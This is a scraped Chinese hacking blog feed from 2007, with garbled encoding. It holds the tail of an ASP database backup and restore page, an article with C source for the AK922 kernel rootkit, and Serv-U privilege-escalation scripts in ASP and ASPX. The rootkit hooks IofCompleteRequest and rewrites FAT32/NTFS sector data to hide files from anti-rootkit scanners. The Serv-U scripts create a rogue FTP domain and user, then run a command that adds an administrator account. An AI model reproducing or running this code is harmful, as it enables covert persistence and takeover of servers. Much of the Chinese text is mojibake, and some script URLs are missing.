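' the request, so anyone who can reach the page can drive SQLDMO with the
' supplied login and read or overwrite files wherever the SQL Server service
' account may write. Keep it behind web-server authentication and address
' restrictions, and remove it once the job is done.
if request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
dim srv,bak,rest,failed
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
' "$1" inside the supplied path stands for the database name.
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>娌℃湁杈撳叆鏁版嵁搴撳悕縐?</font>"
else
' SQLDMO reports failures as COM errors. Without On Error Resume Next the
' page aborts before any err.number check can run; with it, every call that
' can fail is checked right after it. COM error codes are negative HRESULTs,
' so the test is "<> 0", not "> 0".
on error resume next
failed = false
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
if err.number<>0 then
failed = true
response.write err.number&"<font color=red><br>"
response.write Server.HTMLEncode(err.description)&"</font>"
err.clear
else
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
' "Files" is not declared anywhere on this page, so Devices receives Empty;
' presumably the intent was to leave Devices unset and back up to Files.
bak.Devices=Files
bak.Action   = 0       ' SQLDMOBackup_Database: full database backup
bak.Initialize   = 1   ' overwrite whatever the backup file already holds
bak.Files=bak_file
bak.SQLBackup srv
if err.number<>0 then
failed = true
response.write err.number&"<font color=red><br>"
response.write Server.HTMLEncode(err.description)&"</font>"
err.clear
end if
srv.DisConnect
end if
Set bak = Nothing
Set srv = Nothing
' Success is reported only when no step failed.
if not failed then Response.write "<font color=green>澶囦喚鎴愬姛!</font>"
elseif act="restore" then
' Restore only while the database is not in use!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
if err.number<>0 then
failed = true
response.write err.number&"<font color=red><br>"
response.write Server.HTMLEncode(err.description)&"</font>"
err.clear
else
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' SQLDMORestore_Database: full database restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True ' force restore over the existing database
rest.SQLRestore srv
' Check after SQLRestore, which is the call that can fail.
if err.number<>0 then
failed = true
response.write err.number&"<font color=red><br>"
response.write Server.HTMLEncode(err.description)&"</font>"
err.clear
end if
srv.DisConnect
end if
Set rest = Nothing
Set srv = Nothing
if not failed then Response.write "<font color=green>鎭㈠鎴愬姛!</font>"
else
Response.write "<font color=red>璇烽夋嫨澶囦喚鎴栨仮澶?</font>"
end if
on error goto 0
end if
end if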
%></td>
</tr>
</table>
</body>
</html>

 



]]>
AK922: 紿佺牬紓佺洏浣庣駭媯嫻嬪疄鐜版枃浠墮殣钘?/title><link>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Fri, 12 Oct 2007 03:58:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/34018.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/34018.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/34018.html</trackback:ping><description><![CDATA[AK922: 紿佺牬紓佺洏浣庣駭媯嫻嬪疄鐜版枃浠墮殣钘?br>浣滆咃細Azy<br>email: Azy000@gmail.com<br>瀹屾垚浜庯細2007-08-08<br><br>   鐩墠錛屼竴浜涘凡鍏紑鐨勪富嫻乤nti-rootkit媯嫻嬮殣钘忔枃浠朵富瑕佹湁涓ょ鏂規硶錛氱涓縐嶆槸鏂囦歡緋葷粺灞傜殑媯嫻嬶紝灞炰簬榪欎竴綾葷殑鏈塱cesword錛宒arkspy錛実mer絳夈傜浜岀渚挎槸紓佺洏綰у埆鐨勪綆綰ф嫻嬶紙Disk Low-Level Scanning錛夛紝灞炰簬榪欎竴綾葷殑ark涔熷緢澶氾紝鍏稿瀷浠h〃涓簉ootkit unhooker錛宖ilereg錛坕s鐨勬彃浠訛級錛宺ootkit revealer錛宐lacklight絳夈傚綋鐒訛紝榪樻湁涓浜涘伐鍏鳳紝瀹冧滑鍦ㄥ簲鐢ㄥ眰涓婇氳繃璋冪敤ZwQueryDirectoryFile鏉ュ疄鏂芥嫻嬨?br>   椹卞姩涔熷ソ錛屽簲鐢ㄤ篃緗紝璇寸櫧浜嗗氨鏄洿鎺ユ垨闂存帴鍙戦両RP鍒頒笅灞傞┍鍔ㄣ傜涓綾葷殑鍙戦佸埌FSD涓紙fastfat.sys/ntfs.sys錛夛紝絎簩綾昏鍙戦佸埌紓佺洏椹卞姩錛坉isk.sys錛夛紝鑰屽悗IRP渚夸細鎼哄甫鐩稿簲鐨勬枃浠朵俊鎭繑鍥烇紝榪欐椂涓婂眰搴旂敤鍐嶆牴鎹繑鍥炰俊鎭繘琛屽鐞嗗拰鍒ゆ柇銆備絾鏄敱浜嶥isk綰ф瘮FS綰ф洿搴曞眰錛孖RP榪斿洖緇欐垜浠殑鏄洿鍔犳帴榪戞暟鎹師濮嬬粍緇囨柟寮忕殑紓佺洏鎵囧尯淇℃伅錛屾墍浠ュ湪Disk灞備笂瀹炴柦鏂囦歡媯嫻嬪彲浠ュ緱鍒版洿浠や漢淇℃湇鐨勭粨鏋溿備絾榪欏茍涓嶇瓑浜庤榪欑被媯嫻嬩笉鑳借鍑昏觸銆傛湰鏂囧氨灝嗕粙緇嶄竴縐嶇粫榪囪綾繪嫻嬬殑瀹炵幇鏂規硶錛屽綋鐒訛紝榪欎篃鏄湪AK922涓嬌鐢ㄧ殑銆?br>   瀵逛簬瑕佸疄鐜版枃浠墮殣钘忕殑RK錛屼笌鍏惰鏄?#8220;緇曡繃”錛岃繕涓嶅璇存槸“鎷︽埅” -- 鎸傞挬鏌愪簺鍐呮牳鍑芥暟璋冪敤錛屼互渚垮湪榪斿洖涓婂眰涔嬪墠鎴戜滑鏈夋満浼氳繃婊ゆ帀寰呴殣钘忔枃浠剁殑淇℃伅銆?br>   AK922閲囩敤鐨勬柟娉曟槸Hook鍐呮牳鍑芥暟IofCompleteRequest銆傝繖涓嚱鏁板緢鏈夋剰鎬濓紝鍥犱負瀹冧笉浠呮槸涓涓嚑涔庡湪浠諱綍椹卞姩涓兘瑕佽皟鐢ㄧ殑鍑芥暟錛岃屼笖鍙傛暟涓濂藉惈鏈塈RP銆傛湁浜咺RP錛屽氨鏈変簡涓鍒囥傝繖浜涚壒鎬у喅瀹氫簡瀹冨緢閫傚悎鍋氭垜浠殑“鍌鍎?#8221;銆備絾鏇撮噸瑕佺殑鏄紝涓鑸湪椹卞姩涓皟鐢↖ofCompleteRequest涔嬫椂IRP鎿嶄綔閮藉凡瀹屾瘯錛孖RP涓浉鍏沖煙宸茬粡濉厖浜嗗唴瀹癸紝榪欏氨渚夸簬鎴戜滑鐫鎵嬬洿鎺ヨ繘琛岃繃婊よ屼笉鐢ㄥ啀鍋氳濡傚彂閫両RP瀹夎瀹屾垚渚嬬▼涔嬬被鐨勬搷浣溿?br>   涓嬮潰灝辯潃閲嶈涓涓嬪伐浣滄祦紼嬶細<br>   
棣栧厛錛屽垽鏂璏ajorFunction鏄笉鏄疘RP_MJ_READ浠ュ強IO鍫嗘爤涓殑DeviceObject鏄惁鏄鐩橀┍鍔ㄧ殑璁懼瀵硅薄錛屽洜涓鴻繖鎵嶆槸鎴戜滑瑕佸鐞嗙殑鏍稿績IRP錛屾墍鏈塧rk鐩存帴鍙戦佸埌Disk灞傜殑IRP鍦ㄨ繖閲岄兘鍙互琚嫤鎴埌銆?br>   鎺ヤ笅鏉ョ殑澶勭悊瑕佺壒鍒敞鎰忥紝榪涘叆鍒拌繖閲屾椂IRQL鏄湪APC_LEVEL浠ヤ笂鐨勶紝鍥犳鎴戜滑涓嶈兘紕頒換浣旾RP涓殑鐢ㄦ埛妯″紡緙撳啿鍖猴紝涓紕版瀬鏈夊彲鑳借摑錛屼篃灝辨槸璇存垜浠笉鑳界洿鎺ュ鐞嗙浉鍏崇鐩樻墖鍖轟俊鎭紝鑰屽繀欏婚氳繃ExQueueWorkItem鎺掗槦涓涓猈orkItem鐨勬柟娉曟潵澶勭悊銆傞櫎姝や箣澶栵紝鐢變簬Disk灞傚湪璁懼鍫嗘爤涓浜庨潬涓嬬殑浣嶇疆錛屽ぇ閮ㄥ垎IRP鍙戝埌榪欓噷鏃跺綋鍓嶈繘紼嬩笂涓嬫枃鏃╁凡涓嶆槸鍘熷IRP鍙戣搗鑰呯殑榪涚▼涓婁笅鏂囦簡錛岃繖閲岀殑鍙戣搗鑰呭簲鐞嗚В涓篴rk榪涚▼銆傚垢榪愮殑鏄湪IRP鐨凾ail.Overlay.Thread鍩熶腑榪樹繚瀛樼潃鍘熷ETHREAD鎸囬拡錛屼負浜嗘搷浣滅敤鎴鋒ā寮忕紦鍐插尯錛屽繀欏昏皟鐢↘eAttachProcess鍒囧埌IRP鍙戣搗鑰呯殑涓婁笅鏂囩幆澧冧腑錛岃岃繖涓伐浣滃彧鑳藉湪澶勪簬PASSIVE_LEVEL綰т笂鐨勫伐浣滆呯嚎紼嬩腑鎵ц銆傚湪DISPATCH_LEVEL綰т笂錛屽仛鐨勪簨瓚婂皯瓚婂ソ銆?br>   鍒氬紑濮嬫垜榪樺垎涓ょ鎯呭喌榪涜澶勭悊錛氬洜涓哄茍涓嶆槸鎵鏈夌殑IRP閮戒笉澶勫湪鍘熷涓婁笅鏂囦腑錛屾瘮濡俰cesword鍙戠殑IRP鍒拌繖閲岃繕鏄鍦╥cesword.exe榪涚▼涓殑錛岃繖鏃舵垜璁や負鍙互涓嶇敤鎺掗槦宸ヤ綔欏癸紝榪欐牱灝卞彲浠ヨ妭鐪佸緢澶氱郴緇熻祫婧愶紝鎻愰珮榪囨護鏁堢巼銆備簬鏄垜璇曞浘鍦―ISPATCH_LEVEL綰т笂鐩存帴鎿嶄綔鐢ㄦ埛緙撳啿鍖猴紝浣嗚繖鏍規湰琛屼笉閫氥傞┍鍔ㄥ緢涓嶇ǔ瀹氾紝涓嶄竴浼氬氨钃濅簡銆傛晠绱㈡ц佽佸疄瀹炲湴鎺掗槦鍘諱簡錛岀劧鍚庡啀鍒嗘儏鍐靛鐞嗐備唬鐮佸涓嬶細<br><br>// 澶勭悊Disk Low-Level Scanning<br>if(irpSp->MajorFunction == IRP_MJ_READ && IsDiskDrxDevice(irpSp->DeviceObject) && irpSp->Parameters.Read.Length != 0)<br>{    <br>        <br>    orgnThread = Irp->Tail.Overlay.Thread;<br>    orgnProcess = IoThreadToProcess(orgnThread);<br>        <br>    if(Irp->MdlAddress)<br>    {        <br>        UserBuffer = (PVOID)((ULONG)Irp->MdlAddress->StartVa + Irp->MdlAddress->ByteOffset);<br>            <br>        // UserBuffer蹇呴』鏈夋晥<br>        if(UserBuffer)<br>        {                    <br>            <br>            if(KeGetCurrentIrql() == DISPATCH_LEVEL)<br>            {                    <br>            <br>                RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX));<br>                <br>                WorkerCtx->UserBuffer = UserBuffer;<br>                WorkerCtx->Length = irpSp->Parameters.Read.Length;<br>                WorkerCtx->EProc = orgnProcess;<br>                <br>                ExInitializeWorkItem(&WorkerCtx->WorkItem, WorkerThread, WorkerCtx);<br>                                <br>                
ExQueueWorkItem(&WorkerCtx->WorkItem, CriticalWorkQueue);<br>            } <br>        }<br>        <br>    }<br>}<br>  <br><br>   鏉ュ埌宸ヤ綔鑰呯嚎紼嬶紝鍒頒簡PASSIVE_LEVEL綰т笂錛屽垏鎹笂涓嬫枃涔嬪悗錛屼技涔庡畨鍏ㄥ浜嗐備絾鏄互闃蹭竾涓錛屾搷浣滅敤鎴鋒ā寮忕紦鍐插尯涔嬪墠榪樻槸瑕佽皟鐢≒robeForXxx鍑芥暟鍏堝垽鏂竴涓嬨傜浉鍏充唬鐮佸涓嬶細<br><br>VOID WorkerThread(PVOID Context)<br>{<br>    KIRQL irql;<br>    PEPROCESS eproc = ((PWORKERCTX)Context)->orgnEProc;<br>    PEPROCESS currProc = ((PWORKERCTX)Context)->currEProc;<br>    //PMDL mdl;<br>        <br><br>    if(((PWORKERCTX)Context)->UserBuffer)<br>    {<br>        if(eproc != currProc)<br>        {<br><br>            KeAttachProcess(eproc);<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){<br><br>                //DbgPrint("we can't op the buffer now :-(");<br>                KeDetachProcess();    <br>                return;<br>            }<br>            <br>            KeDetachProcess();    <br>            <br>        }else{<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){}<br>        }<br>    <br>    }<br>}<br><br>   鍑嗗宸ヤ綔緇堜簬綆楁槸鍋氬緱宸笉澶氫簡錛屼笅闈㈠氨寮濮嬬湡姝f秱鏀圭鐩樻墖鍖哄唴瀹逛簡銆傝繖閲屽皢娑夊強鍒癋AT32鍜孨TFS紓佺洏鏂囦歡緇撴瀯錛屾垜鍏堟妸瑕佺敤鍒扮殑涓昏緇撴瀯鍒楀嚭鏉ワ紝鍏朵綑鐨勫ぇ瀹跺彲浠ュ弬鑰冦奛TFS Documentation銆嬨?br><br>typedef struct _INDEX_HEADER{<br>    UCHAR            magic[4];<br>    USHORT            UpdateSequenceOffset;<br>    USHORT            SizeInWords;<br>    LARGE_INTEGER    
LogFileSeqNumber;<br>    LARGE_INTEGER    VCN;<br>    ULONG            IndexEntryOffset;    // needed!<br>    ULONG            IndexEntrySize;<br>    ULONG            AllocateSize;<br>}INDEX_HEADER, *PINDEX_HEADER;<br><br><br>typedef struct _INDEX_ENTRY{<br>    LARGE_INTEGER        MFTReference;<br>    USHORT            Size;                // needed!<br>    USHORT            FileNameOffset;<br>    USHORT            Flags;<br>    USHORT            Padding;<br>    LARGE_INTEGER        MFTReferParent;<br>    LARGE_INTEGER        CreationTime;<br>    LARGE_INTEGER        ModifyTime;<br>    LARGE_INTEGER        FileRecModifyTime;<br>    LARGE_INTEGER        AccessTime;<br>    LARGE_INTEGER        AllocateSize;<br>    LARGE_INTEGER        RealSize;<br>    LARGE_INTEGER        FileFlags;<br>    UCHAR            FileNameLength;<br>    UCHAR            NameSpace;<br>    WCHAR            FileName[1];<br>}INDEX_ENTRY, *PINDEX_ENTRY;<br><br>   鍦ㄨ鍙栫鐩樻枃浠朵俊鎭椂姣忔閮芥槸浠ヤ竴涓墖鍖哄ぇ灝忥紙512 bytes錛夌殑鏁存暟鍊嶈繘琛岀殑錛屽鏋滀笉浜嗚В鐩稿簲鍗風殑緇勭粐褰㈠紡鍜屾暟鎹粨鏋勶紝閭d箞鎰熻灝辨槸鏁版嵁澶氳岀箒鏉傦紝鎼滅儲鏁堢巼涔熷緢浣庛備絾杈呬互涓婅堪緇撴瀯渚垮彲蹇熷畾浣嶅緟闅愯棌鏂囦歡騫惰繘琛屾秱鏀廣傝繖閲屼笉寰椾笉璇翠竴鍙ワ紝綆楁硶鐨勯珮鏁堟槸寰堥噸瑕佺殑錛屽鏋滈噰鐢ㄦ毚鍔涙悳绱㈢殑鏂瑰紡錛岄偅涔堢郴緇烞SOD鐨勬鐜囦細澶уぇ澧炲姞銆?br>   鍦‵AT32鍗蜂笂錛屽綋AK922鎼滅儲鍒版枃浠禔K922.sys鐨勭洰褰曢」鏃訛紝灝嗗叾0x0鍋忕Щ澶勭殑鏂囦歡鍚嶇殑絎竴涓瓧鑺傜疆涓?0xe5"錛屽嵆鏍囪涓哄垹闄ゃ傝繖鏍峰嵆鍙揪鍒版楠梐rk鐨勭洰鐨勩備絾涓轟簡鏇村姞闅愯斀錛屼笉璁﹚inhex瀵熻鍑烘潵錛屾渶濂芥妸鏂囦歡鍚嶅叏閮ㄦ竻0銆?br>   澶勭悊NTFS鍗風◢寰夯鐑︿簺錛屾枃浠惰褰曞拰绱㈠紩欏歸兘瑕佹姽騫插噣錛屽叿浣撳疄鐜拌浠g爜錛岃繖閲屼笉鍐嶈禈榪般?br><br>VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)<br>{<br>    ULONG i;<br>    BOOLEAN bIsNtfsIndex;<br>    BOOLEAN bIsNtfsFile;<br>    ULONG offset = 0;<br>    ULONG indexSize = 0;<br>    PINDEX_ENTRY currIndxEntry = NULL;<br>    PINDEX_ENTRY preIndxEntry = NULL;<br>    ULONG currPosition;<br><br>    <br>    bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0);<br>    bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0);<br><br>    if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE)<br>    {            <br>    <br>        for(i = 0; i < BufLen/0x20; i++)<br>        
{<br>            if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3))<br>            {<br><br>                *(PUCHAR)UserBuf        = 0xe5;<br>                *(PULONG)((ULONG)UserBuf + 0x1)    = 0;<br><br>                break;<br>                    <br>            }<br><br>            UserBuf = (PVOID)((ULONG)UserBuf + 0x20);<br>        <br>        }<br><br>    } else if(bIsNtfsFile) {<br><br>        //DbgPrint("FILE0...");<br><br>        for(i = 0; i < BufLen / FILERECORDSIZE; i++)<br>        {<br>            if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9))<br>            {<br>                memset((PVOID)UserBuf, 0, 0x4);<br>                memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18);<br>                break;<br>            }<br>                <br>            UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE);<br>                <br>        }<br>            <br>    } else if(bIsNtfsIndex) {<br>                            <br>        //DbgPrint("INDX...");<br>        // Index Entries<br>        <br>        offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18;<br>        indexSize = BufLen - offset;<br>        currPosition = 0;<br><br>        currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset);<br>        //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize);<br>                <br>        while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0)<br>        {<br>            if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9))<br>            {<br>                memset((PVOID)currIndxEntry->FileName, 0, 18);<br><br>                if(currPosition == 0)<br>                {<br>                    ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size;<br>                    break;<br>                }<br><br>                preIndxEntry->Size += currIndxEntry->Size;<br>                <br>                break;<br>            }<br><br>   
         currPosition += currIndxEntry->Size;<br>            preIndxEntry = currIndxEntry;<br>            currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size);<br>                    <br>        }<br>    }<br>}<br><br>   姘村鉤鏈夐檺錛屾榪庡ぇ瀹朵笌鎴戜氦嫻併?br><br><br>鍙傝冭祫鏂欙細<br><br>[1] - 銆奛TFS Documentation銆?br>[2] - Azy錛屻奍ceSword & Rootkit Unhooker椹卞姩綆鏋愩?br><br>---------<br><br>鍏充簬AK922(AzyKit)錛氭垜鍐欑殑涓涓彧瀹炵幇鏂囦歡闅愯棌鐨凴K錛屽彲浠ypass鏈枃鎻愬埌鐨勬墍鏈塧rk銆?br>Download @ <a target=_blank><u><font color=#0000ff>http://www.wiiupload.net/sf/65b4e75ec4</font></u></a> <img src ="http://www.shnenglu.com/elva/aggbug/34018.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-10-12 11:58 <a href="http://www.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>鍒嗕韓serv-u鍒╃敤鑴氭湰(asp/aspx/php/perl)http://www.shnenglu.com/elva/archive/2007/08/04/29350.html鍙跺瓙鍙跺瓙Sat, 04 Aug 2007 07:17:00 GMThttp://www.shnenglu.com/elva/archive/2007/08/04/29350.htmlhttp://www.shnenglu.com/elva/comments/29350.htmlhttp://www.shnenglu.com/elva/archive/2007/08/04/29350.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/29350.htmlhttp://www.shnenglu.com/elva/services/trackbacks/29350.htmlASP


<%
' Serv-U ASP privilege-escalation client.
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
' As far as this listing shows, the page posts to itself and walks through
' action=1..3, each step handing Serv-U protocol text to a Microsoft.XMLHTTP
' object; the target URL on the a.open/b.open/c.open lines has been lost in
' extraction, so the listing as shown does not run.
' Defender notes: the only input validation is isnumeric(action); user,
' password and command are echoed back into hidden fields and inline script
' without encoding; the XMLHTTP objects are parked in the Session and only
' aborted on the next plain request. Loopback connections from the web
' worker process to the Serv-U admin port and to port 65500 are the
' observable footprint of this tool.
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if  not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
' Port used for the temporary domain created below.
ftpport = 65500
timeout=3 ' assigned but never read in this listing
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
' Substitute the drive chosen above for the hard-coded "c:" in HomeDir/Access.
newuser=replace(newuser,"c:",f)
select case action
case 1
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>姝e湪榪炴帴 127.0.0.1:<%=port%>,浣跨敤鐢ㄦ埛鍚? <%=user%>,鍙d護錛?lt;%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "
    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>姝e湪鎻愬崌鏉冮檺,璇風瓑寰?..,<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "
    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>鎻愭潈瀹屾瘯,宸叉墽琛屼簡鍛戒護錛?lt;br><font color=red><%=cmd%></font><br><br>
<input type=button value=" 榪斿洖緇х畫 " onClick="location.href='<%=gname()%>';">
</center>
<%
case else
' Clean-up path: abort and drop any XMLHTTP objects left in the Session.
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U 鎻愬崌鏉冮檺 ASP鐗?Goldsun[at]84823714</td>
  </tr>
  <tr align="center" valign="middle">
    <td width="100">鐢ㄦ埛鍚?</td>
    <td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>鍙c浠わ細</td>
    <td><input name="p" type="text" id="p" value="
#l@$ak#.lk;0@P"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>绔鍙o細</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>緋葷粺璺緞錛?lt;/td>
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>鍛姐浠わ細</td>
    <td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
  </tr>
 
  <tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="鎻愪氦">銆
      <input type="reset" name="Submit2" value="閲嶇疆">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</table></form></center>
<% end select
function Gpath()
' Drive of the Windows folder (GetSpecialFolder(0)) as a lowercase "x:"
' string; "c:" when the FileSystemObject cannot be created.
' Note: f is not declared locally, so this appears to reuse the page-level f
' while it runs; the caller assigns the return value afterwards, so that is
' harmless here.
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
 gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
' Absolute URL of the current script, omitting the port when it is 80.
' SERVER_NAME is taken from the request environment, which in many
' configurations reflects the Host header the server accepted.
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>


ASPX


<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

'
' Love, where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)
' Start-button handler. Opens the Serv-U administration listener on
' 127.0.0.1 with the name/password/port from the form, issues SITE
' MAINTENANCE to create a domain on 43859 plus a user in it, logs in to that
' domain, runs "site exec" with the command from the form and then deletes
' the domain again.
' Defender notes: Port is assigned to an Int32 straight from the text box
' (throws on non-numeric input); every reply and every line sent, the
' password included, is echoed into the HTML response unencoded; replies
' are never examined, so a failed step goes unnoticed. Loopback connections
' from the web worker process to the admin port and to 43859 are the
' observable footprint of this tool.
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-deleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
